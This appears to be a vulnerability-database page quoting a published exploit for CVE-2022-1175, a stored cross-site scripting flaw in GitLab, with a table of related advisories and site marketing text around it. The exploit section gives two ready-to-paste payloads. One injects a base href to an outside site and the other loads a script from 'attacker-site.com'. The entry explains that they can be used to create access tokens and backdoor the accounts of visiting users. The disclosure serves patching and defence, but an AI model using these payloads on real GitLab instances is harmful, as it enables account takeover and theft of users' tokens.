| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
| GitLab 14.9 - Stored Cross-Site Scripting Vulnerability | 26 Apr 202200:00 | – | zdt | |
| Gitlab -- multiple vulnerabilities | 31 Mar 202200:00 | – | freebsd | |
| Gitlab OmniAuth Static Passwords and stored XSS | 4 Apr 202216:42 | – | avleonov | |
| GitLab Enterprise Edition 跨站脚本漏洞 | 1 Apr 202200:00 | – | cnnvd | |
| GitLab Community and Enterprise Cross-Site Scripting (CVE-2022-1175) | 7 Nov 202200:00 | – | checkpoint_advisories | |
| CVE-2022-1175 | 4 Apr 202219:46 | – | cve | |
| CVE-2022-1175 | 4 Apr 202219:46 | – | cvelist | |
| CVE-2022-1175 | 4 Apr 202219:46 | – | debiancve | |
| FreeBSD : Gitlab -- multiple vulnerabilities (8657eedd-b423-11ec-9559-001b217b3468) | 4 Apr 202200:00 | – | nessus | |
| GitLab 14.4 < 14.7.7 / 14.8 < 14.8.5 / 14.9 < 14.9.2 (CVE-2022-1175) | 18 Apr 202200:00 | – | nessus |
# Exploit Title: Gitlab Stored XSS
# Date: 12/04/2022
# Exploit Authors: Greenwolf
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://about.gitlab.com/install
# Version: GitLab CE/EE versions 14.4 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2
# Tested on: Linux
# CVE : CVE-2022-1175
# References: https://github.com/Greenwolf/CVE-2022-1175
Any user can create a project with Stored XSS in an issue. XSS on Gitlab is very dangerous and it can create personal access tokens leading users who visit the XSS page to silently have the accounts backdoor.
Can be abused by changing the base of the project to your site, so scripts are sourced by your site. Change javascript on your site to match the script names being called in the page. This can break things on the page though.
<pre data-sourcepos=""%22 href="x"></pre><base href=http://unsafe-website.com/><pre x=""><code></code></pre>
Standard script include also works depending on the sites CSP policy. This is more stealthy.
<pre data-sourcepos=""%22 href="x"></pre><script src="https://attacker-site.com/bad.js"></script><pre x=""><code></code></pre>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation